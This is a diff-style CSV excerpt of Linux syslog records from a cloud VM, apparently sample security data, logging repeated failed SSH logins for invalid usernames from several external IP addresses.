+15946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:08,UbuntuDevEnv,2019-06-26 06:39:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,32320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+15947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:08,UbuntuDevEnv,2019-06-26 06:39:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:11,UbuntuDevEnv,2019-06-26 06:39:10,auth,UbuntuDevEnv,info,Failed password for invalid user colord from 46.101.149.230 port 53930 ssh2,32320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,colord,46.101.149.2,53930,,
+15949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:11,UbuntuDevEnv,2019-06-26 06:39:10,auth,UbuntuDevEnv,info,Disconnected from invalid user colord 46.101.149.230 port 53930 [preauth],32320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,colord,46.101.149.2,53930,,
+15950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:11,UbuntuDevEnv,2019-06-26 06:39:10,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 53930:11: Bye Bye [preauth],32320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,53930,,
+15951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:47,UbuntuDevEnv,2019-06-26 06:39:47,auth,UbuntuDevEnv,info,Invalid user sun from 45.59.69.138 port 47664,32453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sun,45.59.69.1,47664,,
+15952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:47,UbuntuDevEnv,2019-06-26 06:39:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:47,UbuntuDevEnv,2019-06-26 06:39:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,32453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:49,UbuntuDevEnv,2019-06-26 06:39:49,auth,UbuntuDevEnv,info,Failed password for invalid user sun from 45.59.69.138 port 47664 ssh2,32453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sun,45.59.69.1,47664,,
+15955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:49,UbuntuDevEnv,2019-06-26 06:39:49,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 47664:11: Bye Bye [preauth],32453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,47664,,
+15956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:39:49,UbuntuDevEnv,2019-06-26 06:39:49,auth,UbuntuDevEnv,info,Disconnected from invalid user sun 45.59.69.138 port 47664 [preauth],32453,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sun,45.59.69.1,47664,,
+15957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:14,UbuntuDevEnv,2019-06-26 06:40:14,auth,UbuntuDevEnv,info,Invalid user lachlan from 138.68.29.52 port 41340,32557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lachlan,138.68.29.5,41340,,
+15958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:14,UbuntuDevEnv,2019-06-26 06:40:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:14,UbuntuDevEnv,2019-06-26 06:40:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,32557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+15960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:16,UbuntuDevEnv,2019-06-26 06:40:15,auth,UbuntuDevEnv,info,Failed password for invalid user lachlan from 138.68.29.52 port 41340 ssh2,32557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lachlan,138.68.29.5,41340,,
+15961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:16,UbuntuDevEnv,2019-06-26 06:40:15,auth,UbuntuDevEnv,info,Disconnected from invalid user lachlan 138.68.29.52 port 41340 [preauth],32557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lachlan,138.68.29.5,41340,,
+15962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:16,UbuntuDevEnv,2019-06-26 06:40:15,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 41340:11: Bye Bye [preauth],32557,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,41340,,
+15963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:37,UbuntuDevEnv,2019-06-26 06:40:37,auth,UbuntuDevEnv,info,Invalid user client1 from 139.99.98.248 port 46304,32636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client1,139.99.98.2,46304,,
+15964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:37,UbuntuDevEnv,2019-06-26 06:40:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:37,UbuntuDevEnv,2019-06-26 06:40:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,32636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:39,UbuntuDevEnv,2019-06-26 06:40:38,auth,UbuntuDevEnv,info,Failed password for invalid user client1 from 139.99.98.248 port 46304 ssh2,32636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client1,139.99.98.2,46304,,
+15967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:39,UbuntuDevEnv,2019-06-26 06:40:38,auth,UbuntuDevEnv,info,Disconnected from invalid user client1 139.99.98.248 port 46304 [preauth],32636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client1,139.99.98.2,46304,,
+15968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:40:39,UbuntuDevEnv,2019-06-26 06:40:38,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 46304:11: Bye Bye [preauth],32636,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,46304,,
+15969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:17,UbuntuDevEnv,2019-06-26 06:41:16,auth,UbuntuDevEnv,info,Invalid user server from 45.59.69.138 port 36988,32778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,45.59.69.1,36988,,
+15970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:17,UbuntuDevEnv,2019-06-26 06:41:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:17,UbuntuDevEnv,2019-06-26 06:41:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,32778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+15972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:18,UbuntuDevEnv,2019-06-26 06:41:18,auth,UbuntuDevEnv,info,Failed password for invalid user server from 45.59.69.138 port 36988 ssh2,32778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,45.59.69.1,36988,,
+15973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:19,UbuntuDevEnv,2019-06-26 06:41:18,auth,UbuntuDevEnv,info,Disconnected from invalid user server 45.59.69.138 port 36988 [preauth],32778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,45.59.69.1,36988,,
+15974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:19,UbuntuDevEnv,2019-06-26 06:41:18,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 36988:11: Bye Bye [preauth],32778,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,36988,,
+15975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:42,UbuntuDevEnv,2019-06-26 06:41:42,auth,UbuntuDevEnv,info,Invalid user drupal from 138.68.29.52 port 58654,32869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,drupal,138.68.29.5,58654,,
+15976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:42,UbuntuDevEnv,2019-06-26 06:41:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:42,UbuntuDevEnv,2019-06-26 06:41:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,32869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+15978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:44,UbuntuDevEnv,2019-06-26 06:41:43,auth,UbuntuDevEnv,info,Failed password for invalid user drupal from 138.68.29.52 port 58654 ssh2,32869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,drupal,138.68.29.5,58654,,
+15979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:44,UbuntuDevEnv,2019-06-26 06:41:44,auth,UbuntuDevEnv,info,Disconnected from invalid user drupal 138.68.29.52 port 58654 [preauth],32869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,drupal,138.68.29.5,58654,,
+15980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:44,UbuntuDevEnv,2019-06-26 06:41:44,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 58654:11: Bye Bye [preauth],32869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,58654,,
+15981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:54,UbuntuDevEnv,2019-06-26 06:41:53,auth,UbuntuDevEnv,info,Invalid user www from 46.101.149.230 port 47590,32896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,46.101.149.2,47590,,
+15982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:54,UbuntuDevEnv,2019-06-26 06:41:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,32896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+15983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:54,UbuntuDevEnv,2019-06-26 06:41:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:56,UbuntuDevEnv,2019-06-26 06:41:55,auth,UbuntuDevEnv,info,Failed password for invalid user www from 46.101.149.230 port 47590 ssh2,32896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,46.101.149.2,47590,,
+15985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:56,UbuntuDevEnv,2019-06-26 06:41:56,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 47590:11: Bye Bye [preauth],32896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,47590,,
+15986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:41:56,UbuntuDevEnv,2019-06-26 06:41:56,auth,UbuntuDevEnv,info,Disconnected from invalid user www 46.101.149.230 port 47590 [preauth],32896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,46.101.149.2,47590,,
+15987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:02,UbuntuDevEnv,2019-06-26 06:42:02,auth,UbuntuDevEnv,info,Invalid user mom from 64.202.187.152 port 59828,32943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mom,64.202.187.1,59828,,
+15988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:02,UbuntuDevEnv,2019-06-26 06:42:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:02,UbuntuDevEnv,2019-06-26 06:42:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,32943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+15990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:04,UbuntuDevEnv,2019-06-26 06:42:03,auth,UbuntuDevEnv,info,Failed password for invalid user mom from 64.202.187.152 port 59828 ssh2,32943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mom,64.202.187.1,59828,,
+15991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:04,UbuntuDevEnv,2019-06-26 06:42:04,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 59828:11: Bye Bye [preauth],32943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,59828,,
+15992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:04,UbuntuDevEnv,2019-06-26 06:42:04,auth,UbuntuDevEnv,info,Disconnected from invalid user mom 64.202.187.152 port 59828 [preauth],32943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mom,64.202.187.1,59828,,
+15993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:19,UbuntuDevEnv,2019-06-26 06:42:18,auth,UbuntuDevEnv,info,Invalid user clamav from 139.99.98.248 port 35220,32998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,139.99.98.2,35220,,
+15994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:19,UbuntuDevEnv,2019-06-26 06:42:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,32998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+15995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:19,UbuntuDevEnv,2019-06-26 06:42:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,32998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:20,UbuntuDevEnv,2019-06-26 06:42:20,auth,UbuntuDevEnv,info,Failed password for invalid user clamav from 139.99.98.248 port 35220 ssh2,32998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,139.99.98.2,35220,,
+15997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:21,UbuntuDevEnv,2019-06-26 06:42:20,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 35220:11: Bye Bye [preauth],32998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,35220,,
+15998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:21,UbuntuDevEnv,2019-06-26 06:42:20,auth,UbuntuDevEnv,info,Disconnected from invalid user clamav 139.99.98.248 port 35220 [preauth],32998,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clamav,139.99.98.2,35220,,
+15999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:48,UbuntuDevEnv,2019-06-26 06:42:47,auth,UbuntuDevEnv,info,Invalid user james from 45.59.69.138 port 54556,33106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,james,45.59.69.1,54556,,
+16000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:48,UbuntuDevEnv,2019-06-26 06:42:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,33106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:48,UbuntuDevEnv,2019-06-26 06:42:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,33106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+16002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:50,UbuntuDevEnv,2019-06-26 06:42:50,auth,UbuntuDevEnv,info,Failed password for invalid user james from 45.59.69.138 port 54556 ssh2,33106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,james,45.59.69.1,54556,,
+16003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:50,UbuntuDevEnv,2019-06-26 06:42:50,auth,UbuntuDevEnv,info,Disconnected from invalid user james 45.59.69.138 port 54556 [preauth],33106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,james,45.59.69.1,54556,,
+16004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:42:50,UbuntuDevEnv,2019-06-26 06:42:50,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 54556:11: Bye Bye [preauth],33106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,54556,,
+16005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:43:10,UbuntuDevEnv,2019-06-26 06:43:09,auth,UbuntuDevEnv,info,Invalid user jenkins from 138.68.29.52 port 47748,33192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,138.68.29.5,47748,,
